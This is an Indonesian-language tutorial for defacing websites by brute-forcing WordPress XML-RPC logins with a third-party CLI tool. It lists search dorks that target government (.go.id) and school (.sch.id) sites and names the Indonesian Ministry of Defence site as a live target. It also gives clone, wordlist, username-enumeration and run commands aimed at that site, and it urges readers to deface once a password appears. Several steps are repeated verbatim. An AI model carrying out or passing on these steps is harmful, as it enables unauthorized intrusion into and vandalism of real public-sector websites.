Assalamualaikum Brother
kali ini saya akan membagikan tutorial deface metode XMLRPC Brute Force tutorial yang ini memakai tools CLI ( Command Line Interface ).. tools XMLRPC Brute Force ini dibuat oleh Zeerx7. toolsnya bisa di pakai di termux,linux,clound shell,cmd/terminal kalian.
Dork :
Inurl /xmlrpc.php
Inurl /xmlrpc.php site:.com
Inurl /xmlrpc.php site:.go.id
Inurl /xmlrpc.php site:.sch.id
Oke langsung saja disini saya sudah memiliki target yaitu : https://www.kemhan.go.id/xmlrpc.php
masuk ke terminal kalian kemudian masukkan perintah
git clone https://github.com/404rgr/xmlrpc-bf
kemudian masuk ke directorynya
cd xmlrpc-bf
kalian bisa mengambil wordlist brute force : https://pastebin.com/raw/jtnRM6Vm
trus simpan di directory xmlrpc-bf dengan extensi .txt contoh : pass.txt
dan jangan lupa sebelum di bruteforce cek usernya dulu dengan cara http://target.com/?author=1
nah jika sudah, setelah itu jalankan scriptnya
php xmlrpc.php [ Target ] [ User ] [ List Password ]
contoh :
php xmlrpc.php https://www.kemhan.go.id/xmlrpc.php admin pass.txt
selanjutnya kalian hanya harus sabar menunggu passwordnya muncul
git clone https://github.com/404rgr/xmlrpc-bf
kemudian masuk ke directorynya
cd xmlrpc-bf
trus simpan di directory xmlrpc-bf dengan extensi .txt contoh : pass.txt
dan jangan lupa sebelum di bruteforce cek usernya dulu dengan cara http://target.com/?author=1
nah jika sudah, setelah itu jalankan scriptnya
php xmlrpc.php [ Target ] [ User ] [ List Password ]
contoh :
php xmlrpc.php https://www.kemhan.go.id/xmlrpc.php admin pass.txt
Kalau Vuln maka passwordnya akan muncul.. kamu tingal depes aja
Dan Ini Hasil Gwe
Sekian tutorial dari saya semoga bermanfaat dan terimakasih